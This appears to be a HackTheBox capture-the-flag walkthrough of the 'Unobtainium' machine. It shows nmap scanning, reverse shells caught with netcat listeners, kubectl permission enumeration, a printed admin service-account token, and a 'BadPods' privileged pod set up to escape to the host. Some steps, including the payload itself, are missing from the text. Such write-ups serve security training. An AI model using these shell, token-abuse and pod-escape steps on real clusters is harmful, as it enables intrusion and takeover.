Posted onEdited onInHackTheBox walkthroughViews: Word count in article: 4.9kReading time ≈18 mins.
introduce
OS: Linux Difficulty: Hard Points: 40 Release: 10 Apr 2021 IP: 10.10.10.235
information gathering
first use nmap as usaul
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/hackthebox/machine/unobtainium] └─# nmap -sV -v -p- --min-rate=10000 10.10.10.235 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 2379/tcp open ssl/etcd-client? 2380/tcp open ssl/etcd-server? 8443/tcp open ssl/https-alt 10250/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 10256/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 31337/tcp open http Node.js Express framework
There is a lot’s of ports open
Let’s start with port-80
Port-80
There is a simple html page.
Let’s download the .deb package, i am using kali linux
Unzip the file we got .deb package.
Let’s extract the files inside .deb package without installing them.
Inside stuff/opt/unobtainium/ there is a executable called unobtainium
Let’s run that
1 2 3 4 5 6 7 8 9
┌──(root💀kali)-[~/hackthebox/machine/unobtainium/stuff/opt/unobtainium] └─# ls chrome_100_percent.pak libEGL.so libvulkan.so resources unobtainium chrome_200_percent.pak libffmpeg.so LICENSE.electron.txt resources.pak v8_context_snapshot.bin chrome-sandbox libGLESv2.so LICENSES.chromium.html snapshot_blob.bin vk_swiftshader_icd.json icudtl.dat libvk_swiftshader.so locales swiftshader ┌──(root💀kali)-[~/hackthebox/machine/unobtainium/stuff/opt/unobtainium] └─# ./unobtainium --no-sandbox (node:2278) electron: The default of contextIsolation is deprecated and will be changing from false to truein a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
We got the error Unable to reach unobtainium.htb.
Let’s add unobtainium.htb in our /etc/hosts file.
Let’s again open the executable and this time we don’t get error.
I think this executable contact to a server so for capture the packet i use wireshark on tun0.
And i am right when i click on Todo they send a POST req to the server.
Let’s check what was capture inside this POST req.
app.listen(3000); console.log('Listening on port 3000...');
After reading the file i found nothing interesting but i am sure that it’s using react or nodejs or something like that if the server uses that so there is a file called package.json which has the list of npm packages used and we also find vulnerability for that specific packages.
request:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
POST /todo HTTP/1.1
Host: unobtainium.htb:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
┌──(root💀kali)-[~/hackthebox/machine/unobtainium] └─# nc -lvp 9001 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.235. Ncat: Connection from 10.10.10.235:57654. bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@webapp-deployment-5d764566f4-h5zhw:/usr/src/app# id id uid=0(root) gid=0(root) groups=0(root) root@webapp-deployment-5d764566f4-h5zhw:/usr/src/app# whoami whoami root
Boom we got the shell.
First Let’s get our user.txt inside /root/.
1 2 3 4 5 6
root@webapp-deployment-5d764566f4-h5zhw:~# ls ls user.txt root@webapp-deployment-5d764566f4-h5zhw:~# cat user.txt cat user.txt a6649836e48c4a2fef53804d75c1c1f3
Privilege escalation
And if you notice we are root i think it’s a docker container.
Anyway let’s run linpeas.
there is a cronjob running that removes kubectl in the container every minute.
But there is no kubectl executable in the container.
Let’s download a kubectl executable and transfer it in docker inside /tmp folder.
Install and Set Up kubectl on Linux
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root💀kali)-[~/hackthebox/machine/unobtainium] └─# curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 154 100 154 0 0 107 0 0:00:01 0:00:01 --:--:-- 107 100 44.2M 100 44.2M 0 0 2972k 0 0:00:15 0:00:15 --:--:-- 3193k ┌──(root💀kali)-[~/hackthebox/machine/unobtainium] └─# ls Exploit.sh kubectl message.json unobtainium_1.0.0_amd64.deb unobtainium_debian.zip exploit_stage2.sh luci.sh stuff unobtainium_1.0.0_amd64.deb.md5sum ┌──(root💀kali)-[~/hackthebox/machine/unobtainium] └─# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ...
We change the name of kubectl to xkubectl to avoid being removed by the cron job.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl version --short ./xkubectl version --short Client Version: v1.21.0 Server Version: v1.20.0
Now let’s see current rights with kubectl with privileged resources like secrets.
1 2 3
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets <66f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets no
let’s check about namespaces.
1 2 3 4
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list namespaces <4-h5zhw:/tmp# ./xkubectl auth can-i list namespaces Warning: resource 'namespaces' is not namespace scoped yes
Let’s list all the namespaces.
1 2 3 4 5 6 7 8
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl get namespace ./xkubectl get namespace NAME STATUS AGE default Active 96d dev Active 95d kube-node-lease Active 96d kube-public Active 96d kube-system Active 96d
1 2 3 4 5 6
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets -n dev <zhw:/tmp# ./xkubectl auth can-i list secrets -n dev no root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets -n kube-system <# ./xkubectl auth can-i list secrets -n kube-system no
We don’t have permission of any namespaces.
Let’s check if we have permission of pods or not in the dev namespaces.
1 2 3 4 5 6 7 8 9
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list pods -n dev <-h5zhw:/tmp# ./xkubectl auth can-i list pods -n dev yes root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl get pods -n dev NAME READY STATUS RESTARTS AGE devnode-deployment-cd86fb5c-6ms8d 1/1 Running 28 95d devnode-deployment-cd86fb5c-mvrfz 1/1 Running 29 95d devnode-deployment-cd86fb5c-qlxww 1/1 Running 29 95d
Pods
A Kubernetes cluster can have one or more nodes. Each node can have one or more Pods. Each Pod can have one or more running containers.
And we see in the previous command there is three Pods each with a running container in the dev namespace.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# .//xkubectl describe pod/devnode-deployment-cd86fb5c-6ms8d -n dev <scribe pod/devnode-deployment-cd86fb5c-6ms8d -n dev Name: devnode-deployment-cd86fb5c-6ms8d Namespace: dev Priority: 0 Node: unobtainium/10.10.10.235 Start Time: Sun, 17 Jan 2021 18:16:21 +0000 Labels: app=devnode pod-template-hash=cd86fb5c Annotations: <none> Status: Running IP: 172.17.0.5 IPs: IP: 172.17.0.5 Controlled By: ReplicaSet/devnode-deployment-cd86fb5c Containers: devnode: Container ID: docker://bf852df0b8a7e049a21983112b178bfd65a3e27180c7463b441a7de2aeb1aedb Image: localhost:5000/node_server Image ID: docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c Port: 3000/TCP Host Port: 0/TCP State: Running Started: Thu, 22 Apr 2021 19:28:37 +0000 Last State: Terminated Reason: Error Exit Code: 137 Started: Wed, 24 Mar 2021 16:01:28 +0000 Finished: Wed, 24 Mar 2021 16:02:13 +0000 Ready: True Restart Count: 28 Environment: <none> Mounts: /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro) Conditions: Type Status Initialized True Ready True ContainersReady True PodScheduled True Volumes: default-token-rmcd6: Type: Secret (a volume populated by a Secret) SecretName: default-token-rmcd6 Optional: false QoS Class: BestEffort Node-Selectors: <none> Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s node.kubernetes.io/unreachable:NoExecute op=Exists for 300s Events: <none>
If you notice the difference i am in a webapp-deployment container enumerating devnode-deployment containers in Pods running in the dev namespace.
We are looking at two different environments, the classic production environment and the development environment. I should be able to repeat the steps i just have to make the RHOST and RPORT variables and upload them to the container I’m currently in above to get another foothold in the development environment.
For that we need to forward the port to the devnode-deployment container “172.17.0.5:3000”
I am using Chisel for that.
If you don’t known how to use chisel or how to download it check this out.
chisel
First i run chisel in my kali linux to open a server.
┌──(root💀kali)-[~] └─# nc -lvp 9002 Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::9002 Ncat: Listening on 0.0.0.0:9002 Ncat: Connection from 10.10.10.235. Ncat: Connection from 10.10.10.235:48266. bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@devnode-deployment-cd86fb5c-6ms8d:/usr/src/app# id id uid=0(root) gid=0(root) groups=0(root) root@devnode-deployment-cd86fb5c-6ms8d:/usr/src/app# whoami whoami root
Boom we got the shell as devnode-deployment.
Now again tranfer the kubectl executable in the box and check if we list secrets now.
Data ==== ca.crt: 1066 bytes namespace: 11 bytes token: eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLXRmbXAyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyNDYzNTA1Zi05ODNlLTQ1YmQtOTFmNy1jZDU5YmZlMDY2ZDAiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.Xk96pdC8wnBuIOm4Cgud9Q7zpoUNHICg7QAZY9EVCeAUIzh6rvfZJeaHucMiq8cm93zKmwHT-jVbAQyNfaUuaXmuek5TBdY94kMD5A_owFh-0kRUjNFOSr3noQ8XF_xnWmdX98mKMF-QxOZKCJxkbnLLd_h-P2hWRkfY8xq6-eUP8MYrYF_gs7Xm264A22hrVZxTb2jZjUj7LTFRchb7bJ1LWXSIqOV2BmU9TKFQJYCZ743abeVB7YvNwPHXcOtLEoCs03hvEBtOse2POzN54pK8Lyq_XGFJN0yTJuuQQLtwroF3579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow
Let’s list the info of the token.
1 2 3 4 5 6
root@devnode-deployment-cd86fb5c-6ms8d:/tmp# ./kubectl --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLXRmbXAyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyNDYzNTA1Zi05ODNlLTQ1YmQtOTFmNy1jZDU5YmZlMDY2ZDAiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.Xk96pdC8wnBuIOm4Cgud9Q7zpoUNHICg7QAZY9EVCeAUIzh6rvfZJeaHucMiq8cm93zKmwHT-jVbAQyNfaUuaXmuek5TBdY94kMD5A_owFh-0kRUjNFOSr3noQ8XF_xnWmdX98mKMF-QxOZKCJxkbnLLd_h-P2hWRkfY8xq6-eUP8MYrYF_gs7Xm264A22hrVZxTb2jZjUj7LTFRchb7bJ1LWXSIqOV2BmU9TKFQJYCZ743abeVB7YvNwPHXcOtLEoCs03hvEBtOse2POzN54pK8Lyq_XGFJN0yTJuuQQLtwroF3579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow cluster-info <579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow cluster-info Kubernetes control plane is running at https://10.96.0.1:443 KubeDNS is running at https://10.96.0.1:443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'
Let’s check if we create pods or not if we can create pods we can use BadPods.
1 2 3
root@devnode-deployment-cd86fb5c-6ms8d:/tmp# ./kubectl --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLXRmbXAyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyNDYzNTA1Zi05ODNlLTQ1YmQtOTFmNy1jZDU5YmZlMDY2ZDAiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.Xk96pdC8wnBuIOm4Cgud9Q7zpoUNHICg7QAZY9EVCeAUIzh6rvfZJeaHucMiq8cm93zKmwHT-jVbAQyNfaUuaXmuek5TBdY94kMD5A_owFh-0kRUjNFOSr3noQ8XF_xnWmdX98mKMF-QxOZKCJxkbnLLd_h-P2hWRkfY8xq6-eUP8MYrYF_gs7Xm264A22hrVZxTb2jZjUj7LTFRchb7bJ1LWXSIqOV2BmU9TKFQJYCZ743abeVB7YvNwPHXcOtLEoCs03hvEBtOse2POzN54pK8Lyq_XGFJN0yTJuuQQLtwroF3579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow auth can-i create pod <d4JBQQYrpm6Wdm9tjbOyGL9KRsNow auth can-i create pod yes
Yes we can create pods now let’s create a BadPods. where everything is allowed with the help of BadPods.
Bad Pod #1: Everything allowed
everything-allowed-exec-pod.yaml
I modify the everything-allowed-exec-pod.yaml file to get the root hash and save the file as luci.yaml.